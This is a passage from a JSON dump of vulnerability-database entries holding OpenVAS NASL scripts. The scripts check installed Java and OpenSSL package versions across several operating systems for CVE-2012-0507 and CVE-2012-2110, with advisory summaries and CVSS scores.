\"http://www.metasploit.com/modules/exploit/multi/browser/java_atomicreferencearray\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_require_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\njreVer = \"\";\n\n## Get JRE Version from KB\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\nif(jreVer)\n{\n ## Check for Oracle Java SE versions 7, 6 Update 27 and earlier,\n ## 5.0 Update 31 and earlier\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.2\") ||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.30\") ||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.33\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:36", "description": "This host is installed with Oracle Java SE and is prone to code\n execution vulnerability.", "cvss3": {}, "published": "2012-08-22T00:00:00", "type": "openvas", "title": "Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310802947", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802947", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_java_se_code_exec_vuln_win.nasl 11857 2018-10-12 08:25:16Z cfischer $\n#\n# Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802947\");\n script_version(\"$Revision: 11857 $\");\n script_cve_id(\"CVE-2012-0507\");\n script_bugtraq_id(52161);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:25:16 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-22 15:52:21 +0530 (Wed, 22 Aug 2012)\");\n script_name(\"Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/48589\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html\");\n script_xref(name:\"URL\", value:\"http://www.metasploit.com/modules/exploit/multi/browser/java_atomicreferencearray\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attackers to bypass the Java sandbox\n restriction and execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Oracle Java SE versions 7 Update 2 and earlier, 6 Update 30 and earlier,\n and 5.0 Update 33 and earlier\");\n script_tag(name:\"insight\", value:\"The 'AtomicReferenceArray' class implementation does not ensure that the\n array is of the Object[] type, which allows attackers to cause a denial of\n service (JVM crash) or bypass Java sandbox restrictions.\");\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n script_tag(name:\"summary\", value:\"This host is installed with Oracle Java SE and is prone to code\n execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\nif(jreVer)\n{\n ## 5.0 Update 31 and earlier\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.2\") ||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.30\") ||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.33\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-6343", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864325", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-6343\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079149.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864325\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:03:09 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-6343\");\n script_name(\"Fedora Update for openssl FEDORA-2012-6343\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"openssl on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0i~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-11T11:06:45", "description": "Check for the Version of openssl", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-6343", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:864325", "href": "http://plugins.openvas.org/nasl.php?oid=864325", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-6343\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"openssl on Fedora 17\";\ntag_insight = \"The OpenSSL toolkit provides support for secure communications between\n machines. OpenSSL includes a certificate management tool and shared\n libraries which provide various cryptographic algorithms and\n protocols.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079149.html\");\n script_id(864325);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:03:09 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-6343\");\n script_name(\"Fedora Update for openssl FEDORA-2012-6343\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0i~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-26T00:00:00", "type": "openvas", "title": "RedHat Update for openssl RHSA-2012:0518-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870589", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870589", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2012:0518-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00021.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870589\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 10:35:51 +0530 (Thu, 26 Apr 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"RHSA\", value:\"2012:0518-01\");\n script_name(\"RedHat Update for openssl RHSA-2012:0518-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n Multiple numeric conversion errors, leading to a buffer overflow, were\n found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\n from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n (Distinguished Encoding Rules) encoded data read from a file or other BIO\n input could cause an application using the OpenSSL library to crash or,\n potentially, execute arbitrary code. (CVE-2012-2110)\n\n All OpenSSL users should upgrade to these updated packages, which contain\n a backported patch to resolve this issue. For the update to take effect,\n all services linked to the OpenSSL library must be restarted, or the system\n rebooted.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~22.el5_8.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~11.el5_8.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl097a-debuginfo\", rpm:\"openssl097a-debuginfo~0.9.7a~11.el5_8.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:57:16", "description": "Check for the Version of openssl098e", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for openssl098e CESA-2012:0518 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:881190", "href": "http://plugins.openvas.org/nasl.php?oid=881190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl098e CESA-2012:0518 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n Multiple numeric conversion errors, leading to a buffer overflow, were\n found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\n from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n (Distinguished Encoding Rules) encoded data read from a file or other BIO\n input could cause an application using the OpenSSL library to crash or,\n potentially, execute arbitrary code. (CVE-2012-2110)\n \n All OpenSSL users should upgrade to these updated packages, which contain\n a backported patch to resolve this issue. For the update to take effect,\n all services linked to the OpenSSL library must be restarted, or the system\n rebooted.\";\n\ntag_affected = \"openssl098e on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018596.html\");\n script_id(881190);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:39:47 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2012:0518\");\n script_name(\"CentOS Update for openssl098e CESA-2012:0518 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl098e\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl098e\", rpm:\"openssl098e~0.9.8e~17.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:46", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: openssl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2017-04-13T00:00:00", "id": "OPENVAS:71273", "href": "http://plugins.openvas.org/nasl.php?oid=71273", "sourceData": "#\n#VID 7184f92e-8bb8-11e1-8d7b-003067b2972c\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 7184f92e-8bb8-11e1-8d7b-003067b2972c\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: openssl\n\nCVE-2012-2110\nThe asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL\nbefore 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not\nproperly interpret integer data, which allows remote attackers to\nconduct buffer overflow attacks, and cause a denial of service (memory\ncorruption) or possibly have unspecified other impact, via crafted DER\ndata, as demonstrated by an X.509 certificate or an RSA public key.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.openssl.org/news/secadv_20120419.txt\nhttp://marc.info/?l=full-disclosure&m=133483221408243\nhttp://www.vuxml.org/freebsd/7184f92e-8bb8-11e1-8d7b-003067b2972c.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(71273);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-2110\");\n script_version(\"$Revision: 5950 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-13 11:02:06 +0200 (Thu, 13 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:26 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"FreeBSD Ports: openssl\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"openssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.1_1\")<0) {\n txt += \"Package openssl version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt ));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:03:51", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-73)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120151", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120151", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120151\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:41 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-73)\");\n script_tag(name:\"insight\", value:\"Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110 )\");\n script_tag(name:\"solution\", value:\"Run yum update openssl098e to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-73.html\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"openssl098e\", rpm:\"openssl098e~0.9.8e~17.8.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl098e-debuginfo\", rpm:\"openssl098e-debuginfo~0.9.8e~17.8.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:57:30", "description": "Check for the Version of openssl", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for openssl MDVSA-2012:060 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:831568", "href": 